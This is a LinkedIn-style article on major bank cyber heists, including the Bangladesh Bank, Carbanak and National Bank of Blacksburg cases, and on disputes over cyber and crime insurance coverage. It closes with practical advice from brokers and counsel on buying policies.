Bank Hack Tales:  When What's Old is New Again

Bank Hack Tales: When What's Old is New Again

No alt text provided for this image

More and more, corporate boards are mandating cyber insurance to transfer risk, but watch out, because you might not get what you paid for. A recent International Monetary Fund (IMF) report estimates that annual banking losses could be as high as "9% of net income or $100 billion annually."

Bank breaches impact the viability of both the bank and the customer’s ability to transfer funds or access our accounts. JP Morgan reports that "78% of companies were targets of payment fraud last year... 54% of business email compromise (BEC) scams targeted wires and 28% were subject to ACH debit fraud."

In the 2016 Bangladesh Bank cyber heist, $81 million disappeared in no time, and - but for a typo made by the hackers - it could have been $1 billion. The SWIFT messaging system serves over 11,000 banks and relies on each bank to keep access to its service secure.

More recently, the Bank of Chile lost $10 million to hackers after SWIFT was used to send the money to Hong Kong. The bank is now working with insurers to recoup its losses. Bloomberg reports that in May of this year, $15 million was stolen from Banxico, as hackers attacked the domestic payments system SPEI. And Bancomext was targeted by North Korean hackers attempting to steal $110 million and resulted in the international payments system being frozen across the country.

The Silence Before the (Banking) Storm

Criminal syndicates have been using malware for years in multi-stage attacks that take advantage of unpatched systems, untrained users and weak processes. These kinds of hackers are incredibly patient and creative.

Industry veteran Scott Scheferman described the attackers as “a criminal ring with many operative layers that work in coordination.... it’s not unusual at all for the threat to stay in ‘monitor’ mode for extended periods of time before performing the ‘power moves’ at the end of the heist." 

For example, the notorious FIN7 or Carbanak Gang, known for its multi-purpose malware, stole over $1 billion from more than 100 banks over several years. What made Carbanak so successful in hacking banks? Their malware combined keylogging, form grabbing, point-of-sale (POS)/ HTTP monitoring, and desktop video capture for stealing banking data.

In August of 2018, the Department of Justice indicted the Carbanak gang leaders on 26 counts, including conspiracy to commit wire and bank fraud and computer hacking. FIN7 had started their own pen testing company Combi Security to cover their activities and used instant messengers Jabber and HipChat to share files and instructions.

It’s hard to disentangle the many aspects of these breaches. Some are targeted or use insiders, others utilize social engineering, and many are the result of malvertising from innocent browsing. Users click on shady links or enable dangerous macros in Word documents which come to them in the form of fake invoices or bogus IRS communications - as in this example. And with so much data scraping from LinkedIn, Facebook and online dumps from recent data breaches, the phishing threat vector is likely to establish the foothold hackers need.

Many 2017 bank hacks utilized utilized Emotet banking malware, which evades sandbox detection and uses Powershell and other ‘living off the land’ techniques to download additional malware payloads.

The current one-two punch is from Smokeloader and Trickbot (a data stealer). Clients can be pwnd in seconds and unless they have protections against scripts and sophisticated malware variants, their systems may become part of a multi-stage attack. Hackers will collect username/passwords, move to other workstations, repeat and use video and keystroke capturing malware to watch how the user transfers money in third-party systems like SWIFT, SPEI, STAR Network or Navigator.

The ability to access these third-party services means that the hackers can destroy the integrity of account data by temporarily inflating customer balances, which they can then harvest.

The Impact of GDPR on Banking Fraud

It's no wonder we are seeing stringent rules emerge for the monitoring of networks and multi factor authentication (2FA) in the newly published GDPR and US regulations. Hackers are monitoring users, collecting passwords and then accessing payment systems to wire out funds or send payment card data for use in ATM cash-out schemes. Authentication systems that are used to access payment systems should leverage more attributes about the user and apply a real-time score that verifies the identity and correlates any anomalous activity to that of malicious activity.

But even with regulations in place, breach reports cite a lack of controls or technology capable of preventing one or more phases of the attack. A good red team will surface these weaknesses before the bad guys do.

Most people agree that risk transfer via insurance is necessary to account for gaps in security. For example, Brian Krebs recently reported on a bank hack on the National Bank of Blacksburg (NBB). Account balances were increased, credentials stolen with access to the First Data STAR network for ATMs, and a mule cash-out operation successfully yielded $2.4 million over two separate incidents. In another example in May 2016, it is thought that NBB was phished by Russians and $569k was taken from ATMs. Later, in January 2017, an additional $1.8 million was stolen in the same manner.

"Repeat attacks are common and often successful because they know the environment," adds Cylance’s Scheferman. Now two years later, we are learning the details because the insurer is denying coverage. This hack is very similar to the RBS Worldpay incident, when hackers broke encryption on debit cards and used over 2,000 ATM's to cash out $9 million over a single weekend.

Sign of the Changing Times

The National Bank of Blacksburg incident doesn’t read like a garden variety phishing scam. The malware, monitoring, lateral movements and control over financial workstations enabling debit card production (used by money mules) is a persistent sophisticated hack. International cybersecurity expert Bryan Cunningham points to a problem with insurance cover: "There remains vigorous disagreement – and little clear legal precedent – on basic definitions of terms in cyber insurance policies."

And as the cyber insurance market has added new policy forms to cover emerging risks like social engineering, they then exclude those types of attacks from existing policies. "Traditional crime and FI bond policies are designed to cover losses that arise from embezzlement by employees [where] social engineering attacks are made by external actors, not employees," offered David Lewison, co-leader of the AmWINS Financial Services National Practice. And with the new products, "carriers have sublimited social engineering fraud to low levels due to high volume of claims," adds Ryan Gibney at Lockton, the world’s largest privately held independent insurance broker.

NBB had purchased an $8 million Computer & Electronic Crime rider to its financial bond. The CE Rider points to a "loss resulting directly from an unauthorized party acting alone or in collusion with others, entering or changing Electronic Data or Computer Programs [which] causes property to be transferred, paid or delivered..." NBB also purchased a $50,000 Debit Card Rider to cover lost or stolen debit cards that might be used at ATMs.

NBB argues that the primary attack was against the NBB network which enabled the hackers to access the STAR and Navigator systems, change balances, steal account data and ultimately cash out via the ATMs. And, there was an exclusion of coverage for “loss resulting directly or indirectly from the use or purported use, of credit, debit [cards] used in [ATMs]."

So, the Debit Card Rider which specifically names the ATM becomes the operative policy? "We would expect many crime carriers to try and pigeon hole the coverage through a small sublimit that they apply for social engineering fraud due to the phishing email initial access and behind the scenes criminal activities," said Gibney.

I recently spoke with coverage counsel Scott Godes about NBB and his reaction was, "The loss should be seen as within the heart of the coverage of the policy, particularly the crime rider. One would hope that the insurance carrier should carry the burden of proving that a sublimit applies, as a restriction on coverage."

Recurrent Attacks: a Reasonable Expectation?

Based on the bank hacks going back to the RBS Worldpay incident, what happened in Blacksburg seems likely to occur, or 'reasonable' to expect. "Exclusions and limitations on coverage in insurance policies should be read narrowly, and insurance carriers should not be rewarded for reading them broadly", noted Scott N. Godes, a cyber insurance and commercial litigator.

Here, the exclusion seems to swallow the coverage. The insurer is calling this a single incident. "The crime policy is most likely an occurrence-based policy and the bank should not have coverage limited because the event happened multiple times," stated Lockton’s Gibney.

Buying these policies is complex, however. Godes adds that "insurance carriers should sell products with robust coverage, so that policyholders do not fall through hidden trapdoors at the time of a claim." NBB’s position that the ATM cash-out could not have occurred but for the internal hack on their systems has support from a recent federal court decision in the Second Circuit, Medidata Solutions, Inc. v. Federal Insurance Co. In Medidata, Godes noted, the court ruled that the crime insurance policy provides coverage for a fraudulent scheme and wire transfer, even though the insurer claimed it was not a direct loss.

The court rejected the arguments that the loss was not “direct” because there were steps in between the original fraudulent message and the wiring of funds. This result is favorable for victims of complex phishing and malware attacks.

Conclusion

For those currently looking for cyber insurance, David Lewison suggested some practical steps to get the right coverage.

·      "Work with a broker that specializes in Cyber-liability and Crime/Bond, from the same brokerage;

·      Hold an underwriting/broker meeting or conference call so you can ask questions about who has the ball when something bad happens;

·      Prior to binding coverage, put both policy forms and all endorsements side by side and verify that the coverage has been assembled as intended;

·      It may also be worthwhile for larger insurance buyers to include a claims leader from the insurance company on a call, so you know who you are dealing with at the time of claim."

And, to avoid ending up in court, involve counsel and review your existing and proposed new policies before you buy.

要查看或添加评论,请登录

Barnaby Page的更多文章

  • Ransom Payments and Victim Notice Requirements Come under Federal Scrutiny

    Ransom Payments and Victim Notice Requirements Come under Federal Scrutiny

    There is no shortage of victims when Ransomware appears. And last week, the White House announced sanctions for the…

  • Ransomware and the Perils of Paying

    Ransomware and the Perils of Paying

    Ransomware finds its victims by accident or intentionally and each week, the technology and business model adapt. Some…

    3 条评论
  • DEFEATING RANSOMWARE | OUTFLANKING ATTACKERS THROUGH PUBLIC-PRIVATE COOPERATION

    DEFEATING RANSOMWARE | OUTFLANKING ATTACKERS THROUGH PUBLIC-PRIVATE COOPERATION

    Technical experts, business leaders and state officials agree on one thing about ransomware: it’s a mess. But as we…

    1 条评论
  • M&A Issues have Cyber Front & Center

    M&A Issues have Cyber Front & Center

    Merger & Acquisitions (M&A) involve businesses of all sizes and span all industry sectors. It is currently booming…

  • Ransomware not Dead

    Ransomware not Dead

    “Let me be clear: the situation for Norsk Hydro through this is quite severe,” Chief Financial Officer Eivind Kallevik…

  • DDoS business impact requires Focus

    DDoS business impact requires Focus

    A Distributed Denial of Service (DDoS) attack shuts down your business for hours or days at a time, disrupting supply…

    1 条评论
  • Credit Bureau Overhaul Past Due

    Credit Bureau Overhaul Past Due

    Don't be late on a payment, it can hurt your credit file. College student or 'thin file'? Not to worry, the big three…

  • Targeted Ransomware requires Identity upgrade

    Targeted Ransomware requires Identity upgrade

    This week we are experiencing the latest iteration of ransomware after last month's Wannacry attack. Key takeaways are:…

  • Health Data Ransom Evolves

    Health Data Ransom Evolves

    The Deep.Dot.

  • Inoculate Against Ransomware

    Inoculate Against Ransomware

    Ransomware attacks targeting the healthcare community are sending shockwaves through the industry. In late March…

社区洞察

其他会员也浏览了